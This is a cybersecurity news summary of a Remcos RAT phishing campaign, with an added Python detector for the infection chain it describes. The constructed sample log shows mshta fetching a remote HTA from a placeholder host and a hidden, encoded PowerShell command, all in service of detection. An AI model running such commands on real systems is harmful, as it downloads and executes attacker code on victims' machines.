Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware

Cybersecurity researchers have identified a new phishing campaign leveraging a fileless variant of Remcos RAT malware. This attack capitalizes on known vulnerabilities to remotely control victims’ computers and extract sensitive data.

Attack Overview

• Initial Vector: Phishing email with a purchase order-themed lure.
• Payload: Malicious Microsoft Excel document exploiting a remote code execution flaw (CVE-2017-0199).

Technical Details

• Excel Exploit: Document triggers the download of an HTA file (“cookienetbookinetcahce.hta”) from a remote server.
• HTA File: Encapsulated in layers of JavaScript, Visual Basic Script, and PowerShell code to evade detection.
• Execution: The HTA file retrieves and executes an executable file, followed by running another obfuscated PowerShell program.
• Process Hollowing: Final stage involves process hollowing to deploy Remcos RAT directly in memory.
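As an added example (not code from the article or from the researchers it summarizes), the Python below scans a constructed, simplified process-creation log for the chain the bullets above describe: an Office process launching mshta.exe to fetch a remote HTA, which starts a hidden, encoded PowerShell command that in turn launches an executable. The log line format, the host name, paths and PIDs are assumptions; only the .hta file name comes from the article.

```python
import re
# Constructed sample of process-creation events, one per line; host, paths and PIDs are placeholders.
SAMPLE_LOG = """\
10:01:02 pid=4120 ppid=812 image=C:\\Office\\EXCEL.EXE cmdline=EXCEL.EXE PO-4471.xlsx
10:01:05 pid=4388 ppid=4120 image=C:\\Windows\\System32\\mshta.exe cmdline=mshta.exe http://remote.example/cookienetbookinetcahce.hta
10:01:07 pid=4402 ppid=4388 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline=powershell.exe -w hidden -enc SQBFAFgA
10:01:09 pid=4410 ppid=4402 image=C:\\Users\\Public\\update.exe cmdline=update.exe
10:02:00 pid=5000 ppid=812 image=C:\\Windows\\explorer.exe cmdline=explorer.exe
"""

EVENT_RE = re.compile(r"pid=(\d+) ppid=(\d+) image=(.+?) cmdline=(.*)$")
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

def parse_events(log):
    """Return {pid: (ppid, image basename in lower case, cmdline)} for each event line."""
    events = {}
    for line in log.splitlines():
        m = EVENT_RE.search(line)
        if m:
            events[int(m[1])] = (int(m[2]), m[3].rsplit("\\", 1)[-1].lower(), m[4])
    return events

def ancestry(events, pid):
    """Image names from the process itself up to the last ancestor we have an event for."""
    chain = []
    while pid in events:
        ppid, image, _ = events[pid]
        chain.append(image)
        pid = ppid
    return chain

def detect(log):
    """Return (pid, reason) findings for the Office -> mshta -> PowerShell -> EXE chain."""
    events = parse_events(log)
    findings = []
    for pid, (_, image, cmdline) in events.items():
        parents = ancestry(events, pid)[1:]          # nearest parent first
        parent = parents[0] if parents else ""
        office_descended = bool(OFFICE & set(parents))
        if image in SCRIPT_HOSTS and parent in OFFICE and re.search(r"https?://|\.hta\b", cmdline, re.I):
            findings.append((pid, "Office process launched a script host with a remote HTA"))
        if image in SHELLS and office_descended:
            findings.append((pid, "PowerShell descended from an Office process"))
        if image in SHELLS and re.search(r"-(enc|encodedcommand)\b", cmdline, re.I):
            findings.append((pid, "encoded PowerShell command line"))
        if parent in SHELLS and image not in SHELLS and office_descended:
            findings.append((pid, "executable launched by Office-descended PowerShell"))
    return findings
```

Run against real Sysmon or EDR process-creation telemetry, the same parent-chain logic applies; the explorer.exe line shows that an ordinary process tree produces no finding.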

Capabilities of Remcos RAT

• Information Harvesting: System metadata, file access, clipboard content.
• Remote Commands: Execute commands/scripts, manage services, edit Registry.
• Surveillance: Enable the camera/microphone, record the screen, alter the wallpaper.
• Disruption: Disable keyboard/mouse input.

Related Threats

• Docusign APIs Abuse: Fake invoices through legitimate Docusign accounts.
• ZIP File Concatenation: Bypassing security tools to distribute remote access trojans.

Conclusion: These advanced phishing campaigns underscore the need for heightened cybersecurity measures. Organizations should prioritize employee education on phishing tactics and maintain up-to-date security protocols to mitigate such threats.
